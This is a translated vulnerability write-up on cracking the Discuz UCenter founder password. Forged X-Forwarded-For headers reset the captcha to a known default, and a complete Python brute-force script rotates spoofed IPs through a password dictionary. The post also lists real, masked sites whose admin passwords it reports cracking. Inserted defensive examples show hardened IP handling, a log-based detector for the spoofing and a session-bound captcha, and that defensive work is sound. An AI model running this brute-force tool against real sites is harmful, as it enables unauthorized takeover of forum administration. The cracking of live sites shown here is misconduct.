Discuz's UCenter founder password can be cracked (in some cases)

Source: Internet
Author: User

This was tested black-box, without reading the source code, and it does not rely on recognising the verification code (captcha). The code and several successful cases are attached.

http://192.168.1.105/discuz/uc_server/admin.php

The login page contains a verification code (captcha).

The verification code address is:

http://localhost/discuz/uc_server/admin.php?m=seccode&seccodeauth=250dIGq%2FYDhocuXf3IrsBkvB2k23JXlXAbuWr3X1liUcX94&7500

However, testing showed that when you log on to uc_server, if the IP address is seen for the first time, the seccode defaults to cccc.

The IP address is taken from the X-Forwarded-For header.
That is, after changing the IP address in X-Forwarded-For and opening the verification code URL above again, the image shows cccc.

Therefore, a program can be written that cracks the password by changing the value of X-Forwarded-For.
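The root cause is that the captcha state is keyed on an address taken straight from the client-controlled X-Forwarded-For header. The following Python is an added example (not code from the original post, and not Discuz/UCenter's own code) that puts the weak lookup next to a hardened one, which only honours the header when the request actually arrived from a configured reverse proxy and walks the header from the right so that a client-supplied prefix is ignored. The TRUSTED_PROXIES list and the function names are assumptions.

```python
import ipaddress

# Constructed list of the reverse proxies this application sits behind (assumption).
TRUSTED_PROXIES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("127.0.0.1/32"),
]


def _is_trusted(addr):
    """True if addr parses as an IP and belongs to one of our own proxies."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)


def client_ip_naive(remote_addr, xff):
    """The weak behaviour described in the post: whatever X-Forwarded-For says wins,
    so every request can claim to be a brand-new IP."""
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip_hardened(remote_addr, xff):
    """Only trust X-Forwarded-For when the TCP peer is one of our proxies, then walk the
    header from the right, skipping only addresses that are themselves trusted proxies.
    The first untrusted hop is the real client; anything the client prepended is ignored."""
    if not _is_trusted(remote_addr):
        return remote_addr  # direct connection: the header is attacker input, drop it
    hops = [h.strip() for h in (xff or "").split(",") if h.strip()]
    for hop in reversed(hops):
        if _is_trusted(hop):
            continue  # appended by one of our own proxies on the way in
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr  # garbage in the header: fall back to the TCP peer
        return hop
    return remote_addr


if __name__ == "__main__":
    # Direct connection that forges the header: naive code believes it, hardened code does not.
    print(client_ip_naive("203.0.113.7", "192.0.2.50"))     # 192.0.2.50
    print(client_ip_hardened("203.0.113.7", "192.0.2.50"))  # 203.0.113.7
    # Behind a trusted proxy: the client-prepended 192.0.2.1 is ignored, the proxy-appended hop wins.
    print(client_ip_hardened("10.0.0.4", "192.0.2.1, 198.51.100.5"))  # 198.51.100.5
```

Whatever key the captcha or rate limiter uses (per-IP state, first-seen checks), it must be derived by the hardened function, and the value should then be stored per session rather than per address so that changing the header changes nothing.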
 

The program is written as follows. (The code is rough, sorry.) It takes the founder's password as the example; the administrator's password should work the same way.
 

```python
# coding: utf-8
import httplib, re, random, urllib, time
from sys import argv


# crack: one login attempt with a freshly randomised X-Forwarded-For address
def getHtml(host, htmlhash, htmlpass, htmlseccode):
    ip = str(random.randint(1, 100)) + "." + str(random.randint(100, 244)) + "." + \
         str(random.randint(100, 244)) + "." + str(random.randint(100, 244))
    postHead = {"Host": host,
                "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0",
                "X-Forwarded-For": ip,
                'Content-Type': 'application/x-www-form-urlencoded',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Connection': 'Keep-alive'}
    postContent = 'sid=&formhash=' + htmlhash + '&seccodehidden=' + htmlseccode + \
                  '&iframe=0&isfounder=1&password=' + htmlpass + \
                  '&seccode=cccc&submit=%E7%99%BB+%E5%BD%95'
    resultHtml = httplib.HTTPConnection(host, 80, False)
    resultHtml.request('POST', '/uc_server/admin.php?m=user&a=login', body=postContent, headers=postHead)
    page = resultHtml.getresponse()
    pageConect = page.read()
    return pageConect


# Get formhash and seccodehidden from the login form
def gethashs(host):
    url = 'http://' + host + '/uc_server/admin.php'
    pageContent = urllib.urlopen(url).read()
    r1 = re.compile('<input type="hidden" name="formhash" value="(\S+)"/>')
    htmlhash = r1.findall(pageContent)[0]
    r2 = re.compile('<input type="hidden" name="seccodehidden" value="(\S+)"/>')
    htmlseccode = r2.findall(pageContent)[0]
    return htmlhash + ' ' + htmlseccode


# obtain the host, dictionary file and interval through argv for blasting
if len(argv) == 1:
    print '----> python ' + argv[0] + ' host address dictionary file interval'
    print '----> python ' + argv[0] + ' 192.168.1.105 pass.txt 0.2'
else:
    host = argv[1]
    passfile = argv[2]
    sleeptime = argv[3]
    print 'website host is ' + host
    # retrieve the domain name and then add some passwords derived from it
    hostuser = host.split('.')
    hostuser = hostuser[len(hostuser) - 2]
    hostpass = [hostuser + '000000', hostuser + '000000', hostuser + hostuser, hostuser + '..',
                hostuser + '.', hostuser + 'admin888', hostuser + 'admin123', hostuser + 'admin',
                hostuser + '000000']
    print 'the password dictionary is ' + passfile
    print 'The interval is ' + sleeptime
    print '--->'
    x = gethashs(host).split(' ')
    f = open(passfile, 'r')
    htmlpass = f.read().split('\r\n')
    htmlpass = hostpass + htmlpass
    f.close()
    for i in range(len(htmlpass)):
        time.sleep(float(sleeptime))
        print 'attempt password ' + htmlpass[i]
        # an empty response body means the login went through
        if getHtml(host, x[0], htmlpass[i], x[1]) == '':
            print 'The password is ' + htmlpass[i]
            break
```

python dz_blast.py 192.168.1.117 pass.txt 0

192.168.1.117 is a Discuz instance built in a new virtual machine.
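From the defender's side, a run like the one above shows up in the web server log as a single TCP peer posting to the UCenter admin login over and over while the X-Forwarded-For value changes on every request. The following Python is an added example (not from the original post) that runs that check over constructed log lines; the log format (combined format with X-Forwarded-For appended as a last quoted field), the threshold values and the function names are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (assumption: combined log format with the
# X-Forwarded-For header appended as a final quoted field). Not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2015:10:00:01 +0800] "POST /uc_server/admin.php?m=user&a=login HTTP/1.1" 200 512 "-" "Mozilla/5.0" "192.0.2.11"
203.0.113.7 - - [10/Nov/2015:10:00:02 +0800] "POST /uc_server/admin.php?m=user&a=login HTTP/1.1" 200 512 "-" "Mozilla/5.0" "192.0.2.57"
203.0.113.7 - - [10/Nov/2015:10:00:03 +0800] "POST /uc_server/admin.php?m=user&a=login HTTP/1.1" 200 512 "-" "Mozilla/5.0" "198.51.100.4"
203.0.113.7 - - [10/Nov/2015:10:00:04 +0800] "POST /uc_server/admin.php?m=user&a=login HTTP/1.1" 200 512 "-" "Mozilla/5.0" "203.0.113.200"
203.0.113.7 - - [10/Nov/2015:10:00:05 +0800] "POST /uc_server/admin.php?m=user&a=login HTTP/1.1" 200 512 "-" "Mozilla/5.0" "192.0.2.99"
203.0.113.7 - - [10/Nov/2015:10:00:06 +0800] "POST /uc_server/admin.php?m=user&a=login HTTP/1.1" 200 512 "-" "Mozilla/5.0" "198.51.100.77"
198.51.100.9 - - [10/Nov/2015:10:02:11 +0800] "GET /uc_server/admin.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0" "-"
198.51.100.9 - - [10/Nov/2015:10:02:15 +0800] "POST /uc_server/admin.php?m=user&a=login HTTP/1.1" 302 0 "-" "Mozilla/5.0" "-"
"""

LINE_RE = re.compile(
    r'^(?P<peer>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'\d+ \d+ "[^"]*" "[^"]*" "(?P<xff>[^"]*)"$'
)

# The UCenter login endpoint the script on this page posts to.
LOGIN_PATH = "/uc_server/admin.php?m=user&a=login"


def parse_line(line):
    """Return a dict with peer, method, path and xff, or None if the line does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_xff_rotation(log_text, min_attempts=5, min_distinct_xff=3):
    """Return {peer: (login_attempts, distinct_xff_values)} for every TCP peer that
    posted to the admin login at least min_attempts times while presenting at least
    min_distinct_xff different X-Forwarded-For values. A normal user behind one
    proxy presents one value (or none), so rotation is the tell."""
    attempts = defaultdict(int)
    xff_values = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != LOGIN_PATH:
            continue
        attempts[rec["peer"]] += 1
        xff_values[rec["peer"]].add(rec["xff"])
    return {
        peer: (n, len(xff_values[peer]))
        for peer, n in attempts.items()
        if n >= min_attempts and len(xff_values[peer]) >= min_distinct_xff
    }


if __name__ == "__main__":
    for peer, (n, distinct) in find_xff_rotation(SAMPLE_LOG).items():
        print("%s: %d login POSTs with %d distinct X-Forwarded-For values" % (peer, n, distinct))
```

The legitimate operator at 198.51.100.9 is not reported: one login POST, no header. Because the script sleeps between attempts, the thresholds should be applied over a window of minutes rather than seconds.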

Attached success stories

Without such a dictionary at hand, I just added a few passwords to test, which are common weak passwords.

1. http://**.**.**/  admin123456
2. http://**.**.**/  admin
3. http://**.**.**/  123456

Solution:

Enhanced verification
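Concretely, enhanced verification means the captcha value is bound to the session, never has a default, and is consumed after a single check, so the address the client claims plays no part in whether it passes. The following Python is an added example of that shape, not UCenter's actual code; the in-memory store, the class and method names and the code alphabet are assumptions.

```python
import hmac
import secrets


class SeccodeStore:
    """Per-session captcha state. A plain dict stands in for the session backend
    (assumption); the point is what is keyed on what, not the storage."""

    ALPHABET = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"  # no 0/O or 1/I look-alikes

    def __init__(self):
        self._expected = {}  # session_id -> code shown in the image

    def issue(self, session_id, length=4):
        """Generate a fresh random code for this session and return it so the
        image renderer can draw it. Re-issuing replaces any earlier code."""
        code = "".join(secrets.choice(self.ALPHABET) for _ in range(length))
        self._expected[session_id] = code
        return code

    def verify(self, session_id, submitted):
        """No default value: a session that never fetched an image cannot pass.
        One-time: the code is consumed whether or not it matched, so a wrong guess
        forces a new image. Compared in constant time."""
        expected = self._expected.pop(session_id, None)
        if expected is None or submitted is None:
            return False
        return hmac.compare_digest(expected.upper(), submitted.strip().upper())


if __name__ == "__main__":
    store = SeccodeStore()
    print(store.verify("session-A", "cccc"))  # False: nothing was ever issued
    code = store.issue("session-A")
    print(store.verify("session-A", code))    # True
    print(store.verify("session-A", code))    # False: already consumed
```

Because the key is the session identifier rather than an address, rewriting X-Forwarded-For on each request does not produce a fresh "first-seen" state, and the login handler should also count failed attempts per session and per account.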
